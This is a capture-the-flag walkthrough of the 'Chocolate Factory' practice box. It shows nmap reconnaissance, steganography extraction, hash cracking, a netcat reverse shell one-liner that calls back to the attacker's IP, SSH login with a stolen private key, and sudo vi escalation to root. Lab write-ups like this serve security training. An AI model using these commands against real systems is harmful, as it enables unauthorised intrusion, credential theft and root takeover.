Chocolate Factory

Reconnaissance
Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)
nmap -Pn 10.10.46.164

Detailed Nmap Scan :
Command Breakdown:
(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 21,22,80
(-oN nmap): Saving it into a file called nmap
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.46.164

Enumeration
Port 21: FTP
Anonymous login is allowed so lets go check it out
ftp 10.10.46.164

Lets list the files.

Looks like there is one file and it is a image so lets transfer it to our machine
get gum_room.jpg

Lets look at the image

Lets see if there is information hidden in the file, so lets use steghide
.
steghide info gum_room.jpg

I hit enter for the passphrase and it worked. We have one file called b64.txt
, lets extract it.
steghide --extract -sf gum_room.jpg

Lets read the file

Lets decode it. After decoded this is the output.

We have the password hash for the user Charlie
. Lets use hashcat to crack this hash to get the password for Charlie.
Copy the hash into a file called hash.txt
.

And now lets use hashcat
to crack it.
hashcat -a 0 -m 1800 hash.txt /usr/share/wordlists/rockyou.txt

We found the password: cn7824
, lets try to login through ssh.

Looks like this is not the password for ssh, lets go explore port 80
Port 80: HTTP
Lets visit the website

Its a login page, remember the credentials we found, lets use them to login.

We logged in , looks like we can run commands, and normal commands work so lets run a reverse shell and get a reverse shell, lets first start a netcat listener
nc -lvnp 1234

Lets get a reverse shell from here.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f
Lets execute this command, and we get a reverse shell on the machine

Lets stabilize this shell, using these commands
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
reset
Ctrl + C
export TERM=xterm-color

Lets list the files in the current directory

We have a validate.php
file, lets read it

We see the credentials we just used to login in the web page. I tried to run the key file but it said permission denied

So I used a command that lets us look at some information which is called strings
and it gave me important information
strings key_rev_key

We have a key. With this information we can answer two questions in the room

I was enumerating when I realized that we can change directories into Charlie, so I listed the files and found the user.txt
and some other files.

Lets read the teleport file.

Its a rsa private key, we can use this to login as charlie
through ssh, lets do that. First copy the contents of the file into a file on your machine called id_rsa
.

Now we should change the permissions of the file
chmod 600 id_rsa

Now lets login
ssh -i id_rsa [email protected]

We are logged in.
Privilege Escalation
Lets run sudo -l
to see what we can run as root
sudo -l

Looks like we can run /usr/bin/vi
as root so lets go to GTFOBins to find the commands to escalate our privilege to root.

Lets run this command
sudo vi -c ':!/bin/sh' /dev/null

We are now root, lets cd into the root folder to find the root flag, it looks like we need to run a python script to get the flag, lets run it, oh its asking for a key, remember when we found the key during enumeration, type that in and you should get the flag

Last updated
Was this helpful?